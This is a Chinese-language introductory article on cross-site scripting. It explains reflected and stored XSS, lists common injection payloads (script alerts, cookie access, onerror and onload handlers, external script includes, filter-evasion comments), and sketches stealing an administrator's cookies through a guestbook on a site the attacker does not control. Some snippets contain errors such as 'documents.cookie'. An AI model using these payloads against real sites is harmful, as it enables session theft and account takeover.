当前位置:首页 >> 网络通讯 >> 网络安全 >> 内容

xss经典实例科普

时间:2013/4/19 12:10:00 作者:平凡之路 来源:xuhantao.com 浏览:

xss很多人都不重视,总觉得是鸡肋,那有多少人真正了解xss呢?
 
xss分为存储型跟反射型
所谓的反射型 常出现在url 搜索框
?q=%3Cscript%3E%20alert%28%27%E5%BA%
 
97%E5%B0%8F%E4%B8%89%27%29%3B%3C%2Fscript%3E
 
?w=%3Cscript%3E+alert%28%
 
2F70826450%2F%29%3B%3C%2Fscript%3E&y=5&k=&netid=&v=%D7%DB%BA%CF
 
/inhesearch/search.jsp?
 
channelid=75029&searchword=%3Cscript%3E+alert%28documents.cookie%
 
29%3B%3C%2Fscript%3E&x=51&y=6
 
这些都是所谓的反射型, xss能干嘛? 能偷cookie,怎么样偷呢?ajax异步传输,学过网站开发的都知道ajax是什么东西。一个反射型的xss当你能调用外部的js的时候 只需要把外面写好的ajax代码传输的代码调用下.把获取的cookie发送到指定的文件。cookie能干嘛, 我这里就不啰嗦了
 
存储型的xss
我见过最多的外部存储型的xss,就是留言本,一些交友论坛的站内消息,等这些地方, 反射型的xss别人不点击不触发,涛涛电脑知识网,而存储型的xss存储在数据库,不需要在自己去执行攻击代码, 自动执行。
 
javascript中用
escape()函数可以进行编码
unescape()编码的字符串进行解码。
在通过evel函数执行
 
Script Encoder加密是微软出的
 
加空字符串与乱码混淆加密法
 
通过注释符//在tab 空格脚本中添加垃圾代码,并不影响脚本正常执行
 
<script>alert('店小弎')</script> 最普通的xss代码
<script>alert(documents.cookie);</script> 获取cookie
<img src="javascript:alert('XSS')"> img链接地址xss
<script src="ls.js"> <script> 外部调用攻击代码ls.js
<SCRIPT>alert/*注释了把*/('xss')</SCRIPT> 注释方法防止过滤
<img src="" onerror=alert("xss")> 加载图像失败执行
<iframe onload=alert('店小弎')> 框架
<script>location='123.com';</script> 跳转某页面
 
body{background-image:url(javascript:alert(“xss”))} 在css样式
 
加入
 
 
<a href="javascript:alert('XSS')">店小弎</a> a链接的xss
 
 
这是我经常使用的xss 当然还有其他的, 这些只不过是最常用的, 具体情况具体分析, 学过javascript的童鞋 我相信都可以看懂这些代码是干嘛的。 想玩xss的 我建议还是有时间看下html/javascript 最起码触发的事件,标签等要知道。
 
 
不管做什么事情头脑灵活点, 不要觉得xss是鸡肋,很多的大站都用session,我看到很多大站还是用的cookie,只有后台用的session。 做高并发的时候,假如没有人要求用session,前台都用cookie
 
给个例子.你要渗透一个网站,www.xuhantao.com,而你不认识管理员, 也不知道这个网站是谁的,当你没有办法的时候,随手测试留言功能 出现了xss,留言功能很多的网站程序都要管理审核, 管理审核肯定就会触发.
 
针对过滤也没有说多少。 说的再多,不会看过滤了那些符号,那也没有办法,所以想玩xss的多去测试,本地调试都可以.
一个资深的渗透测试成员。调试能力这些必须要强,自己动手,丰衣足食物.不要想着靠别人。
文章如有不对,或者遗漏的地方 欢迎各位读客补充

相关文章
  • 没有相关文章
  • 徐汉涛(www.xuhantao.com) © 2024 版权所有 All Rights Reserved.
  • 部分内容来自网络,如有侵权请联系站长尽快处理 站长QQ:965898558(广告及站内业务受理) 网站备案号:蒙ICP备15000590号-1